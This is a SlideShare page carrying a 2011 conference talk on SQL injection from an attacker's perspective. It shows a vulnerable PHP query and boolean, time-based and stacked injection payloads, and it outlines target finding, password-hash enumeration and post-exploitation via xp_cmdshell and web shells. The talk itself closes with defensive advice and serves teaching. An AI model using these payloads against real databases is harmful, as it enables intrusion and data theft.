SlideShare ist ein Scribd-Unternehmen logo

It all starts with the ' (SQL injection from attacker's point of view)

Miroslav Stampar
Miroslav Stampar

These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar

TechnologieReisen
1 von 25
Downloaden Sie, um offline zu lesen
It all starts with the ' (SQL injection from attacker's point of view) Miroslav Štampar (dev@sqlmap.org)
What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 2
What is SQL injection? (2)  In plain speak, SQL injection is (mostly) about the unauthorized DBMS data access  Just in special cases, it's about the data modification together with system takeover  “Hello World” vulnerable code example (PHP/MySQL):  $sql = "SELECT * FROM table_name WHERE id =  " . $_GET["id"];  $result = mysql_query($sql) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 3
Well known cases  In period 2005 till 2007 Albert Gonzalez has stolen 130 million credit card numbers  June 2007 – Microsoft U.K. Website defaced  December 2009 – RockYou (32 million credentials stolen)  December 2009 – NASA  July 2010 – The Pirate Bay FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 4
Well known cases (2)  February 2011 – HBGary (Anonymous)  March 2011 – MySQL  March & May 2011 – Comodo (certificate reseller)  June 2011 – Sony, PBS (@LulzSec)  August 2011 – Nokia  September 2011 – NetNames DNS records (Betfair, The Telegraph, The Register, The National Geographic, UPS, Vodafone...) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 5
Attackers' motivation number of vulnerable sites collected x  time spent on each site = const. time spent on particular target /  motivation = const. (target = multiple (co)sites) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 6
Attackers' profiles 1) Targeting easy targets, unfocused, fast pace, predictable behavior, blabbering, don't really care about the target (“script kiddies”) 2) Persistent, focused, slow motion, covert, silent, higher than average technical skills, highly motivated (money, extortion, fame) (“black hats”/“crackers”/”bad guys”) 3) For fun and knowledge, could warn you about the problem found, don't want to cause any damage (”gray hats”/”hackers”/”good guys”) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 7
SQL injection techniques  Boolean/Blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union/Inband – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 8
SQL injection techniques (2)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked – ;INSERT INTO users VALUES (10,  'test', 'testpass'), affecting mainly Microsoft SQL and PostgreSQL platforms, required for data modification, system access (e.g. xp_cmdshell), UDF injection, there are also time and error-based variants for data retrieval  Other (DNS exfiltration, “Lateral”, Second order attacks, etc.) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 9
Attacking phases  Most SQL injection attacks can be dissected into following phases: 1) Searching for a vulnerable parameter (aka. “Injection point”) 2) Fingerprinting backend DBMS (for usage of proper payloads – e.g. error-based) 3) Finding a fastest applicable technique (U>E>B>T=S) 4) Enumeration (retrieving data of interest – e.g. usernames and passwords) 5) Eventual post-exploatation (underlying OS access, data modification, web server takeover) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 10
Attacking workflow (1)  Finding a potential target – underground forums (e.g. antichat.ru), IRC channels, Google (e.g. dorks), domain scanning (e.g. nmap ­p 80), SHODAN (specialized Computer Search Engine), “drive-by” (e.g. proxying of all casual everyday traffic), “hit-list”, etc.  Manual web-browser based GET/POST parameter tampering with “poisonous” SQL characters (e.g. appending character ' to the end of the original parameter value) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 11
Attacking workflow (2)  In case of a contained DBMS error attacker immediately proceeds with the “proper” (DBMS dependent) error-based payloads   FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 12
Attacking workflow (3)  Otherwise, following step is the usage of common boolean based payloads (e.g. AND  1=1­­%20, OR 1=1­­%20, etc.)   FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 13
Attacking workflow (4)  Along the attacking line, proper SQL injection prefix/suffix combination has to be “guessed”  For example, different payloads are needed in cases: ”SELECT * WHERE id='.$_GET[“id”] and ”SELECT * WHERE id=('.$_GET[“id”]')”  Adds one more dimension to the problem (more combinations)  Most common prefixes are: <blank>, ', “, '), “)  Problem of suffix finding can be most often circumvented by the usage of generic comment form: ­­%20 FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 14
Attacking workflow (5)  In case that boolean/blind injection worked, there is a great possibility for union/inband  Brute-force search for proper column number  ORDER BY fast column number finding technique  Looking if it's a partial or full inband case  Finding usable (presented) column FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 15
Attacking workflow (6)  If everything fails attacker could proceed (high motivation required) with common time-based payloads and/or stacked queries  Most commonly, this happens in INSERT/UPDATE/DELETE SQL injection cases (and DBMS error messages are suppressed)  Common payloads are: AND  1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(97))),0), ;IF(2>1) WAITFOR DELAY '0:0:5', ;SELECT COUNT(*)  FROM GENERATE_SERIES(1,5000000), etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 16
Attacking workflow (7)  Enumeration phase consists of retrieving (”stealing”) data of interest:  Database and table names  Table dumps (e.g. users, admin,...)  System stored usernames and password hashes  User privileges and roles  Highly DBMS dependent (system database and table names, common function names, etc.)  Usage of automated tools is highly preferable in boolean/blind and time-based techniques FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 17
Attacking workflow (8)  Eventual post-exploitation is highly bounded by the applicable SQL injection technique(s) and current user privileges  Best/worst case scenario is the availability of stacked technique along with the “admin” privileges  UDF injection (e.g. functions for OS command execution), web shell (e.g. union/inband MySQL INTO OUTFILE), Metasploit payload upload and execution (e.g. stacked Microsoft SQL xp_cmdshell()), etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 18
Process automation 1) Web Application Assessment Proxy (optional) – BURP, WebScarab 2) Automatic SQL injection detection and exploitation tool – sqlmap, Havij, sqlninja 3) Second order exploitation framework – Metasploit (optional) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 19
Introducing sqlmap  “sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)”  Unofficially, sqlmap is AIO (All-In-One) SQL injection tool  Over 10,000 repository updates and/or checkouts on a monthly basis  Part of most popular security distributions: Backtrack, Backbox, Web Security Dojo, OWASP Web Testing,... FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 20
sqlmap capabilities  Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB  Fully supported SQL injection techniques: Boolean/Blind, Error-based, Union/Inband (partial & full), Timed-based, Stacked  Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns, etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 21
sqlmap capabilities (2)  Automatic recognition and cracking of password hashes  Support for IDS/WAF evasion in form of “tampering” scripts  Web server file upload/download  Arbitrary OS command execution and retrieval of standard console output  Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server (Metasploit, ICMPsh) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 22
Closing words (for attackers)  Learn SQL more than "well" – “SQL injection is 100% SQL. The rest is injection”  Setup (virtual) vulnerable environment entirely by yourself – for gaining better mindset and possessing LEGAL assessment testing machine  Mimic with comprehension what other “attackers” do – including automated tools (e.g. sqlmap)  Research defensive mechanisms – for advanced comprehension of the topic FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 23
Closing words (for defenders)  Use (only) prepared SQL statements (bullet- proof against SQL injection attacks)  Self-filtering procedures are prone to common “programmer's” mistakes (e.g. forgetting to hard type-cast the integer parameter value)  Turn-off error (DBMS) reports  Use least privileged run (non-admin “query” user)  Always expect worst scenario and setup accordingly (e.g. use GRANT/REVOKE mechanism accordingly) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 24
Questions? FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 25

Empfohlen

sqlmap internals
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 

Empfohlen

sqlmap internals
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2Tanel Poder
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Oracle sql high performance tuning
Oracle sql high performance tuningOracle sql high performance tuning
Oracle sql high performance tuningGuy Harrison
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...Extreme Apache Spark: how in 3 months we created a pipeline that can process ...
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...Josef A. Habdank
 
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdf
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdfProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdf
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdfJesmar Cannao'
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Making Apache Spark Better with Delta Lake
Making Apache Spark Better with Delta LakeMaking Apache Spark Better with Delta Lake
Making Apache Spark Better with Delta LakeDatabricks
 
Designing and Building Next Generation Data Pipelines at Scale with Structure...
Designing and Building Next Generation Data Pipelines at Scale with Structure...Designing and Building Next Generation Data Pipelines at Scale with Structure...
Designing and Building Next Generation Data Pipelines at Scale with Structure...Databricks
 
Sqlmap
SqlmapSqlmap
Sqlmapshamshad9
 
Database Performance Tuning
Database Performance Tuning Database Performance Tuning
Database Performance Tuning Arno Huetter
 
Getting started with postgresql
Getting started with postgresqlGetting started with postgresql
Getting started with postgresqlbotsplash.com
 
The Top 5 Reasons to Deploy Your Applications on Oracle RAC
The Top 5 Reasons to Deploy Your Applications on Oracle RACThe Top 5 Reasons to Deploy Your Applications on Oracle RAC
The Top 5 Reasons to Deploy Your Applications on Oracle RACMarkus Michalewicz
 
MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용I Goo Lee
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the BufferMiroslav Stampar
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLiMiroslav Stampar
 

Weitere ähnliche Inhalte

Was ist angesagt?

Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2Tanel Poder
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Oracle sql high performance tuning
Oracle sql high performance tuningOracle sql high performance tuning
Oracle sql high performance tuningGuy Harrison
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...Extreme Apache Spark: how in 3 months we created a pipeline that can process ...
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...Josef A. Habdank
 
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdf
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdfProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdf
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdfJesmar Cannao'
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Making Apache Spark Better with Delta Lake
Making Apache Spark Better with Delta LakeMaking Apache Spark Better with Delta Lake
Making Apache Spark Better with Delta LakeDatabricks
 
Designing and Building Next Generation Data Pipelines at Scale with Structure...
Designing and Building Next Generation Data Pipelines at Scale with Structure...Designing and Building Next Generation Data Pipelines at Scale with Structure...
Designing and Building Next Generation Data Pipelines at Scale with Structure...Databricks
 
Database Performance Tuning
Database Performance Tuning Database Performance Tuning
Database Performance Tuning Arno Huetter
 
Getting started with postgresql
Getting started with postgresqlGetting started with postgresql
Getting started with postgresqlbotsplash.com
 
The Top 5 Reasons to Deploy Your Applications on Oracle RAC
The Top 5 Reasons to Deploy Your Applications on Oracle RACThe Top 5 Reasons to Deploy Your Applications on Oracle RAC
The Top 5 Reasons to Deploy Your Applications on Oracle RACMarkus Michalewicz
 
MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용I Goo Lee
 

Was ist angesagt? (20)

Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
Sql injection
Sql injectionSql injection
Sql injection
 
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 2
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Oracle sql high performance tuning
Oracle sql high performance tuningOracle sql high performance tuning
Oracle sql high performance tuning
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
 
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...Extreme Apache Spark: how in 3 months we created a pipeline that can process ...
Extreme Apache Spark: how in 3 months we created a pipeline that can process ...
 
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdf
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdfProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdf
ProxySQL and the Tricks Up Its Sleeve - Percona Live 2022.pdf
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Making Apache Spark Better with Delta Lake
Making Apache Spark Better with Delta LakeMaking Apache Spark Better with Delta Lake
Making Apache Spark Better with Delta Lake
 
Designing and Building Next Generation Data Pipelines at Scale with Structure...
Designing and Building Next Generation Data Pipelines at Scale with Structure...Designing and Building Next Generation Data Pipelines at Scale with Structure...
Designing and Building Next Generation Data Pipelines at Scale with Structure...
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Database Performance Tuning
Database Performance Tuning Database Performance Tuning
Database Performance Tuning
 
Getting started with postgresql
Getting started with postgresqlGetting started with postgresql
Getting started with postgresql
 
The Top 5 Reasons to Deploy Your Applications on Oracle RAC
The Top 5 Reasons to Deploy Your Applications on Oracle RACThe Top 5 Reasons to Deploy Your Applications on Oracle RAC
The Top 5 Reasons to Deploy Your Applications on Oracle RAC
 
MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용
 

Andere mochten auch

Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web VulnerabilityMiroslav Stampar
 
Advanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesAdvanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesTiago Mendo
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
MySQL Connector/J における SQL インジェクションの脆弱性
MySQL Connector/J における SQL インジェクションの脆弱性MySQL Connector/J における SQL インジェクションの脆弱性
MySQL Connector/J における SQL インジェクションの脆弱性JPCERT Coordination Center
 
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性JPCERT Coordination Center
 
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性JPCERT Coordination Center
 
Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性JPCERT Coordination Center
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Psychological science and beliefs
Psychological science and beliefsPsychological science and beliefs
Psychological science and beliefsLance Jones
 
Pelancaran bulan kecergasan 6 Julai 2013
Pelancaran bulan kecergasan 6 Julai 2013Pelancaran bulan kecergasan 6 Julai 2013
Pelancaran bulan kecergasan 6 Julai 2013Laila Mustafa
 
CHS Reunion Slide Show 2001
CHS Reunion Slide Show 2001CHS Reunion Slide Show 2001
CHS Reunion Slide Show 2001kbexter
 
Pertandingan kawad kaki peringkat daerah seremban 1
Pertandingan kawad kaki peringkat daerah seremban 1Pertandingan kawad kaki peringkat daerah seremban 1
Pertandingan kawad kaki peringkat daerah seremban 1Laila Mustafa
 

Andere mochten auch (20)

Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the Buffer
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 
Advanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesAdvanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & Defenses
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
MySQL Connector/J における SQL インジェクションの脆弱性
MySQL Connector/J における SQL インジェクションの脆弱性MySQL Connector/J における SQL インジェクションの脆弱性
MySQL Connector/J における SQL インジェクションの脆弱性
 
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
 
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
 
Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internals
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 
Psychological science and beliefs
Psychological science and beliefsPsychological science and beliefs
Psychological science and beliefs
 
Pelancaran bulan kecergasan 6 Julai 2013
Pelancaran bulan kecergasan 6 Julai 2013Pelancaran bulan kecergasan 6 Julai 2013
Pelancaran bulan kecergasan 6 Julai 2013
 
CHS Reunion Slide Show 2001
CHS Reunion Slide Show 2001CHS Reunion Slide Show 2001
CHS Reunion Slide Show 2001
 
Pertandingan kawad kaki peringkat daerah seremban 1
Pertandingan kawad kaki peringkat daerah seremban 1Pertandingan kawad kaki peringkat daerah seremban 1
Pertandingan kawad kaki peringkat daerah seremban 1
 

Ähnlich wie It all starts with the ' (SQL injection from attacker's point of view)

Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...Ivo Lukač
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Rod Soto
 
4MMSR-3 web vulnerabilities-lecturer
4MMSR-3 web vulnerabilities-lecturer4MMSR-3 web vulnerabilities-lecturer
4MMSR-3 web vulnerabilities-lecturerFabi0_Alejandr0
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Top Security Threats for .NET Developers
Top Security Threats for .NET DevelopersTop Security Threats for .NET Developers
Top Security Threats for .NET DevelopersMikhail Shcherbakov
 
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]Alex Pruden
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish fileyukta888
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines José Ignacio
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
QA Automation Extended Star
QA Automation Extended StarQA Automation Extended Star
QA Automation Extended StarPrice Charlot
 
6.Resource Exhaustion
6.Resource Exhaustion6.Resource Exhaustion
6.Resource Exhaustionphanleson
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualizationamiable_indian
 
Cross Domain Access Policy solution using Cross Origin Resource sharing
